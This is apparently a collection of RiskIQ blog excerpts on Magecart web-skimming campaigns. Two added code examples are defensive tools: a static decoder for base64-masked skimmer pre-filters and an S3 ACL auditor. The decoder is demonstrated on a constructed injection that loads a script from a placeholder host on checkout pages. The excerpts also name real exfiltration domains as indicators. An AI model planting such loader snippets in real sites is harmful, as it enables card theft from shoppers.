
Labs Magecart

MakeFrame: Magecart Group 7’s Latest Skimmer

At RiskIQ, we track many different Magecart groups. We continually observe evolutions in the techniques they employ to skim card data and obfuscate the code that they use for that purpose. These skimmers are becoming increasingly capable, fulfilling a variety of functions to optimize the work of the operators that deploy them. 

On January 24th, we first became aware of a new Magecart skimmer, which we dubbed MakeFrame after its ability to make iframes for skimming payment data. We initially flagged it with our machine learning model for detecting obfuscated code. 

Since then, we have captured several different versions of the skimmer, each sporting various levels of obfuscation, from dev versions in clear code to finalized versions using encrypted obfuscation. So far, RiskIQ has observed MakeFrame on 19 different victim sites. 

In some cases, we've seen MakeFrame using compromised sites for all three of its functions—hosting the skimming code itself, loading the skimmer on other compromised websites, and exfiltrating the stolen data. There are several elements of the MakeFrame skimmer that are familiar to us, but it's this technique in particular that reminds us of Magecart Group 7.

The following is our analysis of this unique skimmer and the process we followed to attribute this skimmer to Magecart Group 7.

Labs Magecart

Magecart Group 8 Blends into NutriBullet.com Adding To Their Growing List of Victims

On Thursday, February 20th, around 3 pm GMT, criminals RiskIQ identifies as Magecart Group 8 placed a JavaScript skimmer on the international website for blender manufacturer NutriBullet, nutribullet.com. Our systems caught the cyber attack as it happened and continue to detect new developments.

After multiple attempts to contact NutriBullet and receiving no response*, RiskIQ initiated the takedown of the attackers' exfiltration domain with the help of abuse.ch and ShadowServer. Group 8 operators were using this domain to receive stolen credit card information, and taking it down prevented new victims.

On March 1st, we observed the skimmer had been removed, but on March 5th, around 7 pm GMT, the cyber attackers placed a new skimmer on the NutriBullet website. We again scrambled to get the infrastructure neutralized. Unfortunately, the criminals still have access to NutriBullet's infrastructure and can continue to replace the skimmer domain in the code to make it work again. Again on March 10th, the cyber attackers were back with another skimmer in yet another script on the NutriBullet website. Until NutriBullet acknowledges our outreach and performs a cleanup, we highly advise against making any purchases on the site as customer data is endangered.

As with all breaches, RiskIQ’s technology and researchers will continue to keep a close eye on the breach and work to take down any additional domains stood up by the criminals. 

The First Skimmer

Labs Magecart

Magecart Group 12’s Latest: Actors Behind Cyberattacks on Olympics Ticket Re-sellers Deftly Swapped Domains to Continue Campaign

A recent blog post by Jacob Pimental and Max Kersten highlighted Magecart activity targeting ticket re-selling websites for the 2020 Olympics and UEFA Euro 2020, olympictickets2020.com and eurotickets2020.com respectively. These sites were compromised by a skimmer using the domain opendoorcdn.com for data exfiltration. With RiskIQ data, our researchers built on the previous reporting to identify more skimming domains used by the attackers, as well as additional compromised sites. RiskIQ can also now attribute all these cyberattacks to Magecart Group 12. 

The obfuscation and skimming code we observed on opendoorcdn.com matches that used by Magecart Group 12, whose skimmer and obfuscation techniques we analyzed in our blog posts, "New Year, Same Magecart: The Continuation of Web-based Supply Chain Attacks" and "Magento Attack: All Payment Platforms are Targets for Magecart Attacks." However, there are differences in the techniques employed by Group 12 in these more recent compromises, which we'll break down here.

In those blog posts, we noted that Group 12 employed base64 encoded checks against the URL looking for the word "checkout" to identify the proper page on which to load their skimmer code. This encoding masked both the check itself and the skimmer URL. Quoting from our May 1st, 2019 report:

"Most of Group 12's injections occur with a pre-filter on the page—a small snippet of JavaScript that checks to see if they want to inject their skimmer on the page. Here's what it looks like:"

Magecart Group 12's script tag from RiskIQ's May report
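As an added example, not RiskIQ's code and not the actual Group 12 injection: the snippet below reconstructs the shape of a base64-masked URL pre-filter from the description above (a string decoded at runtime, tested against the location, and a second decoded string used as the loader URL), then shows how to surface what such a snippet hides without executing it. The sample injection is constructed here, and the host cdn-example.invalid is a placeholder rather than an observed skimmer domain.

```javascript
// Added example: reconstruct and statically unmask a base64-encoded "checkout" pre-filter.
// Not the original Group 12 code; cdn-example.invalid is a placeholder host.
const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');

// Constructed sample injection: the page check and the loader URL are both hidden behind atob().
const SAMPLE_INJECTION =
  "if(new RegExp(window.atob('" + b64('checkout') + "')).test(window.location.href))" +
  "{var s=document.createElement('script');" +
  "s.src=window.atob('" + b64('https://cdn-example.invalid/js/assets.js') + "');" +
  "document.head.appendChild(s);}";

// String literals passed straight to atob(); the length floor skips short noise.
const ATOB_LITERAL = /atob\(\s*['"]([A-Za-z0-9+/]{8,}={0,2})['"]\s*\)/g;

// Decode every atob() literal found in a script body.
function decodeAtobLiterals(scriptText) {
  const found = [];
  for (const m of scriptText.matchAll(ATOB_LITERAL)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    found.push({ encoded: m[1], decoded });
  }
  return found;
}

// Separate decoded literals into page-filter words and loader URLs; a script carrying
// both is the pattern described in the report.
function classifyInjection(scriptText) {
  const literals = decodeAtobLiterals(scriptText);
  const pageFilters = literals
    .filter((l) => /^[a-z_-]+$/i.test(l.decoded))
    .map((l) => l.decoded);
  const loaderUrls = literals
    .filter((l) => /^https?:\/\/\S+$/.test(l.decoded))
    .map((l) => l.decoded);
  return {
    pageFilters,
    loaderUrls,
    looksLikePreFilter: pageFilters.length > 0 && loaderUrls.length > 0,
  };
}

// Replay the pre-filter's decision for a given page URL without running attacker code.
function preFilterFires(scriptText, url) {
  return classifyInjection(scriptText).pageFilters.some((word) => new RegExp(word).test(url));
}
```

Decoding the literals rather than executing the snippet is the point: a crawler that only visits a site's home page never triggers the filter and never sees the loader URL, whereas the decoded literals expose both the targeted path word and the skimmer host from any page the injection appears on.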

External Threat Management Magecart

Magecart: New Research Shows the State of a Growing Threat

Magecart is a rapidly growing cybercrime syndicate comprised of dozens of subgroups that specialize in cyberattacks involving digital credit card theft by skimming online payment forms. It's also fundamentally changing the way we view browser security. 

A global phenomenon, Magecart is threatening the ability of consumers worldwide to shop online safely by stealthily intercepting their credit card data via their browser without the consumer or website owner's knowledge. Although it's just now getting global attention, Magecart has been active for nearly ten years—RiskIQ's earliest Magecart observation occurred on August 8th, 2010. 

Magecart works by operatives gaining access to websites either directly or via third-party services in supply-chain attacks and injecting malicious JavaScript that steals the data shoppers enter into online payment forms, typically on checkout pages. Quietly, it's eating away at the e-commerce industry because website owners lack visibility into the code that's running on their site, which is a bigger problem than most people realize. Skimming code can exist on a breached website for weeks, months, or even indefinitely, victimizing any visitor that makes purchases on that site.

RiskIQ's global discovery platform gathers internet-wide telemetry that enables us to view websites as Magecart actors do; a unique perspective that provides unmatched visibility into this surging threat. In our latest report, we share the valuable insights gleaned from this telemetry data, which yields critical insight into the state of Magecart, whose skimmers have appeared over two million times, and directly breached over 18,000 hosts. 

External Threat Management Magecart

The Consumer Guide to Shopping Safely in the Age of Magecart

For the last ten years, the e-commerce industry has been battling a stealthy enemy in digital web skimming. Dubbed Magecart by RiskIQ when we first reported on the threat, these groups of cybercriminals have been intercepting credit card information from users making purchases online by breaching websites and injecting their JavaScript web skimmers on checkout pages. Just like a physical card skimmer a real-world criminal might put on an ATM or gas pump, these digital skimmers intercept credit card numbers, expiration dates, and CVV numbers when a consumer purchases something online. They then exfiltrate that data to an attacker-owned server to be used by the attacker or sold on the dark web.

From small shops to giant household names like Newegg, Ticketmaster, and British Airways, these attacks have affected thousands of sites, and potentially millions of consumers, virtually without anyone knowing. The most significant factor in Magecart's success is that most site owners lack visibility into the code running on their site. As a result, the average Magecart skimmer lasts over two weeks, with many lasting much longer than that. 

While the onus is very squarely on businesses to protect their customers by increasing their visibility into the code running on their websites, Magecart is only growing more prevalent. In the meantime, consumers can take precautions to avoid being victimized and having their credit card information feed this criminal enterprise. 

Yonathan Klijnsma, RiskIQ's Head Threat Researcher and the leading expert on Magecart, offers five tips you can follow as an online shopper to stay safe.

Check the reputation

Labs Magecart

Old Magecart Domains are Being Bought Up for Monetization

Old Magecart domains are finding new life in subsequent cyber threat campaigns, many of which are entirely unrelated to web skimming. 

Over the years, we’ve outed many Magecart web-skimming campaigns in reports that listed IOCs, including malicious domains that cyber attackers used to inject web-skimming JavaScript into browsers or as a destination for the skimmed payment information. Large portions of these malicious domains have been taken up for sinkholing by various parties. However, some of them are kicked offline by the registrar, put on hold, and then eventually released back into the pool of available domains.

Here’s the catch: when these domains come back online, the script tags that cyber attackers placed on breached websites still call out to them, which means the domains also retain their value to cyber threat actors. Bad guys are taking advantage of these domains coming back up for sale and purchasing them to be once again pressed into service for malicious purposes, whether that be more web skimming or use in malvertising campaigns.

Hijacking JavaScript injections

Many website owners are never aware of an active skimmer threat on their site—RiskIQ found that the average Magecart skimmer stays on a site for over two months, and many stay there indefinitely. The entire lifecycle of these malicious domains—loading JavaScript to an infected website, going offline, and then coming back online again—can pass without the website owner having an inkling that something was wrong. 

External Threat Management Magecart

RiskIQ Launches JavaScript Threats Solution Amidst Surge in Browser-based Cyber Attacks

Browser-based cyber attacks append malicious JavaScript to websites once every five minutes, according to RiskIQ detection data. These cyber attacks, such as web skimming, cryptocurrency mining, fingerprinting, and watering-hole attacks, are responsible for some of the most high-profile breaches in recent history. These digital security breaches include the hack of British Airways, which led to cyber threat actors intercepting credit card data for thousands of customers.

The BA breach, surfaced by RiskIQ last fall, was carried out by the crime syndicate Magecart. Most recently, a sophisticated Magecart group compromised thousands of sites with a supply chain cyber attack targeting misconfigured Amazon S3 buckets.

In the months and years to come, new breeds of these web skimming cyber attacks will likely emerge, whether by new or existing Magecart groups. Payment data is currently the focus, but they will pivot to skim other information such as login credentials. These cyber attacks can take the form of direct compromises to digital security or supply chain compromises in which third-party JavaScript, such as analytics code, is compromised. Supply chain cyber attacks give perpetrators massive reach by granting them access to potentially thousands of sites at once.

JavaScript attacks are lucrative for perpetrators, and cybercrime syndicates have created entire economies around them, with vibrant markets emerging for stolen data, web skimmers, and compromised websites. Meanwhile, businesses are left to weather the reputational and financial damage with loss of market share, lawsuits, and punitive regulatory fines.

The material damages to businesses from JavaScript attacks took sharp focus earlier this month when the first major post-GDPR penalty was announced against British Airways for the breach of its digital security. The proposed amount of £183m represents 1.5% of BA's 2017 revenues and dwarfs the largest pre-GDPR fine levied by the UK's Information Commissioner's Office (ICO) of £500,000.

Labs Magecart

Spray and Pray: Magecart Campaign Breaches Websites En Masse Via Misconfigured Amazon S3 Buckets

On May 14th, RiskIQ covered the latest mass compromise of third-party web suppliers by a Magecart group. This initial report focused on seven of these suppliers, the scripts of which were injected with skimmer code, which possibly affected several thousand websites using their services. 

However, the actual scale of this campaign and the number of sites affected is much larger than previously reported. The actors behind these compromises have automated the process of compromising websites with skimmers by actively scanning for misconfigured Amazon S3 buckets. These buckets are insecure because their access control lists grant read or write access to any authenticated AWS account (the AuthenticatedUsers group) or to everyone, so anyone with an Amazon Web Services account can read or write content to them.

RiskIQ has been monitoring the compromise of S3 buckets since the beginning of the campaign, which started in early April 2019. We’ve been working with Amazon and affected parties to address Magecart injections and misconfigured S3 buckets as we observe them.
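As an added example, not from the RiskIQ article and not Amazon's tooling: the function below audits a bucket ACL in the JSON shape returned by S3 GetBucketAcl for the misconfiguration the paragraphs above describe, grants to the global AllUsers or AuthenticatedUsers groups that allow writing, and produces the hardened ACL that should replace it. The ACL document is constructed for this example; the owner ID is a placeholder.

```javascript
// Added example: flag S3 bucket ACL grants that let any AWS account, or anyone at all,
// overwrite objects, which is how a hosted JavaScript file gets a skimmer appended.
// The ACL below is constructed; it is not a real bucket.
const ALL_USERS = 'http://acs.amazonaws.com/groups/global/AllUsers';
const AUTHENTICATED_USERS = 'http://acs.amazonaws.com/groups/global/AuthenticatedUsers';

// Permissions that allow changing objects or the ACL itself.
const WRITE_LIKE = new Set(['WRITE', 'WRITE_ACP', 'FULL_CONTROL']);

const SAMPLE_ACL = {
  Owner: { ID: 'owner-canonical-id-placeholder' },
  Grants: [
    { Grantee: { Type: 'CanonicalUser', ID: 'owner-canonical-id-placeholder' }, Permission: 'FULL_CONTROL' },
    // The misconfiguration exploited in this campaign: every AWS account may write.
    { Grantee: { Type: 'Group', URI: AUTHENTICATED_USERS }, Permission: 'WRITE' },
    // Public read is how a bucket serves static JavaScript; not a write hole by itself.
    { Grantee: { Type: 'Group', URI: ALL_USERS }, Permission: 'READ' },
  ],
};

// Return one finding per world-scoped grant; write-capable ones are critical.
function auditBucketAcl(acl) {
  const findings = [];
  for (const g of acl.Grants || []) {
    if (g.Grantee.Type !== 'Group') continue;
    const who = g.Grantee.URI === ALL_USERS ? 'anyone on the internet'
      : g.Grantee.URI === AUTHENTICATED_USERS ? 'any AWS account'
      : null;
    if (!who) continue; // other groups (e.g. LogDelivery) are not world-scoped
    findings.push({
      severity: WRITE_LIKE.has(g.Permission) ? 'critical' : 'info',
      grantee: who,
      permission: g.Permission,
    });
  }
  return findings;
}

// Build the replacement ACL: keep non-group grants, drop every AuthenticatedUsers grant,
// and keep AllUsers only as READ, and only if the bucket must serve files directly.
function hardenAcl(acl, keepPublicRead) {
  const Grants = (acl.Grants || []).filter((g) => {
    if (g.Grantee.Type !== 'Group') return true;
    if (g.Grantee.URI === AUTHENTICATED_USERS) return false;
    if (g.Grantee.URI === ALL_USERS) return keepPublicRead && g.Permission === 'READ';
    return true;
  });
  return { Owner: acl.Owner, Grants };
}
```

Run this over the output of `aws s3api get-bucket-acl` for each bucket that hosts site assets; any critical finding means a third party can replace the JavaScript the site loads, regardless of how well the web server itself is locked down.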

We wrote the following article to raise awareness around the security policies for Amazon S3 as well as web-skimming attacks in general.

Discovery of Misconfigured Bucket

Labs Magecart

Magecart Supply-chain Frenzy Continues With AppLixir, RYVIU, OmniKick, eGain, AdMaxim, CloudCMS & Picreel

Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.

Web-based supply-chain attacks, which compromise vendors that supply code that adds or improves website functionality, give attackers access to a wide range of victims at once because the compromised code often integrates with thousands of sites. In this blog, we'll break down the Magecart skimming activity on these seven providers and detail when and how the compromises occurred, including how some of them could have been far worse.

A Widespread Campaign

As the timestamps below indicate, the majority of these compromises happened near the same day, Friday, May 10th.

Some of the targets in this campaign do not even process payments on their websites, showing that the attackers used a “shotgun” approach to great effect, compromising as many websites as they could knowing that at least some of them would be lucrative. RiskIQ found evidence of many other sites also being compromised, including:
